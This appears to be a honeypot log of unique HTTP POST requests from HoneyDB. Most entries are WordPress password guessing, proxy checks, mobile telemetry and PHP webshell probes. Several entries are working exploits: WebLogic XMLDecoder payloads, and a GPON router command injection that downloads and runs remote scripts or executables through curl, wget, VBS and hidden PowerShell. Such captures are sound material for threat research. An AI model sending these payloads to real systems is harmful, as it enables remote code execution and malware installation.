Unique POST requests collected from HoneyDB data
This file has been truncated, but you can view the full file.
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache
Q/Rayd3IZhxBqzgkL0J7deIVkVpJ20LD8qxp2iY6wqlhb7uJMoBoekEb9ZFuseGv3J5TnIUnC7pDXGwIc/1LM7v/5BNrkt/rlfBG7gZ4m7O7CGW0DCGfqGVXT4c7ex/ZNqFhOM1WyXCI+nAcWTbrF95VC2y3XDi1VpsMdE06YNWnmYdB57kkO1ZFTa9uxMukUBALs0kybZEXot2gj8gGd2NnoFzMpfbX85JschPX0MBY1uJV1TdhBQKcQ6h+ZBAC7JVBKqUXtuBu+ZyiJZRk7+OB/kVcWeWKqzEaavg1C1dEg4+sfjWcvU2N2DcvbPsx9aF/qYjhYuJSQ8AeawsNCcvwwlJg1aQuG+hrAPX5qkTOLzmaNTeIVqPUvdDNitzOR+WUyDoOfskqy7Txzxlf9JZy
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1043
Content-Type: multipart/form-data; boundary=WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
895028
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
711ce935c81908a4f1c10d1623d47ff4
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--WOR0qHjEMmPeTS050PkLZSpcdmhsee7bw2--
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=172888
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÁ*4?Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
axa=die('Hello, Peppa!');
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
POST http://check.proxyradar.com/azenv.php?auth=149503078861&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 20
Cache-Control: no-cache
log=admin&pwd=aaaaaa
POST http://check.proxyradar.com/azenv.php?auth=149547882835&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 28
Cache-Control: no-cache
log=jamesatchue&pwd=99999999
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 20
Cache-Control: no-cache
log=admin&pwd=171717
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
axa=die('Hello, Peppa!');
POST http://check.proxyradar.com/azenv.php?auth=149604380857&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=monkey
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache
SqNckt+eYZF7jH4xIPiStx+KsAmgALBzeeEKyXVpDXYERhZ4Tn/7gxAJAtuEdLnBGSraQCHmjktBuyNJU09rKJr0Whbgx0jJwDzFhjqoqezDe4NMY+egJmC5xZ6cW88zRTH2gmLxZ/uV2syHuBmx+qz1g317uBw6ASnBoJDz5+V4wc2nHwvHM/gPUw7m/GNZXFLWTX5y4+VGYKxgg53YwRVrRsKZBjbPymnI6fuMFRAgMO9FX1qY7VHjQEVjc3+rWzSq5SyDQisWCy7+nSxzbGkVGuXk8J9v9Sd8Q8bF9BufnmHfqV6jXQrF1QEQKqsD8isO1KkDOHFx4kXyig5/7wt9mSotStfrgvss/LIxjhx6m47dOtHf+6QQk7Mz8Heuz4aB2O7xmzwU/BrhYu4kMWyCcFVblP2H6SooiTCEchxcdGJ7Unw=
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÜôOÃÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÆ˛Y›∆√«∆fl
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache
log=admin&pwd=test1
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å%ÑlhÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¯+Y›∆√«∆fl
POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=17&ac=50&pos=32518&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.banner","des":"","sug":-1}]
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Host: x.x.x.x
Content-Length: 0
Connection: close
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÁ*4?Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149460066237&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
m=die((string)(111111111*9))
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache
&verifycode=&ip_port=162.252.243.126:8080
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å/ïÊ|Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î&á.Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
m=die('Hello, Peppa!')
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 22
Cache-Control: no-cache
log=admin&pwd=17233333
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅI™cÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E 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</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1069
Content-Type: multipart/form-data; boundary=0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
329937
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
892970794664e96c8e660be7c39e7de0
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--0K1RqzgcY1npdD-Y4_0j7ey5J8yPMEdyBzeIuV--
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅI™cÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl
POST http://check.proxyradar.com/azenv.php?auth=149517555919&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 360
Cache-Control: no-cache
Q6xWx9PNbPx9u2hkZlelWbTXjU4MR+FbF0PgF4FHjZMIe6RjjuTWvskIH6GhDtkvm+J/nOqMlwY2npO1Jw4nZP+rqI6lRuvq1HslIimZ+GzOVCpRITNT/ePfHAiTdF1cxFW1dO3RDkZ6zNHs8wsRa9K5GT0w8ioKO8yGEb23o4zBfnjx0zfTmvw6DyZ76bgRdk24gXRma2/L7lp6MmMOxK5bAtoWOQp/tdoorKUKxGQISPN/R4MohWzajOs6YzvbrzWgK1YX5F8EfwKKlz2XgiCWoMTM9VT+dcxcUzysi5cYZE4yagoOU4YNv72AZ6qFmTVE7k8GjxvAqgmvMYJzcpCDxy8llDDhRvuxG7U=
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åa‰ÃÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞-Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache
BQi0xXwWBUGT77zzl7LXfYu0hFx18CGDGsU6vGrk9HkFAZ9e2Aa0j7iB6c+RnODsuh5q7UaiDS8blMr2DYnqEv/dBbVu52tVhPyg8XqgShGUteW7KbXtibEeUdeW4lJ17y0lpLV4tJVqbRwV3DyhPxk2FxeQfqCvp2LLwDNQ8RLuhPzh4KBxvKcUrKfqBV4JBa+ZMWIFqiG/DffTYrDfP7x0l3iKL3MJXh5xiU9AZROuhrqN+FulvH2pcvxcxsokL55kMndBW6Q6M07OA9+hGRJ35G9k6at6BhuopdoTakVOp6xh84lI9hKCQeOOzPTUlrUzwF1ZsUkQjal49REteqnl81k2mPvAcG0j6uWtiKXi3lRwF3gkvjlhJm233pN0Nd9Dsw==
POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache
&verifycode=&ip_port=162.252.243.126:8080
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache
log=172&pwd=172zxc
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ål»9≤Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÅ Y›∆√«∆fl
POST http://check.proxyradar.com/azenv.php?auth=149607147675&a=PSCMN&i=1082769120&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ål÷yyÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îìD!Y›∆√«∆fl
POST http://behacdn.ksmobile.net/cfcl HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 38
&KÜWÍÕ`i'c
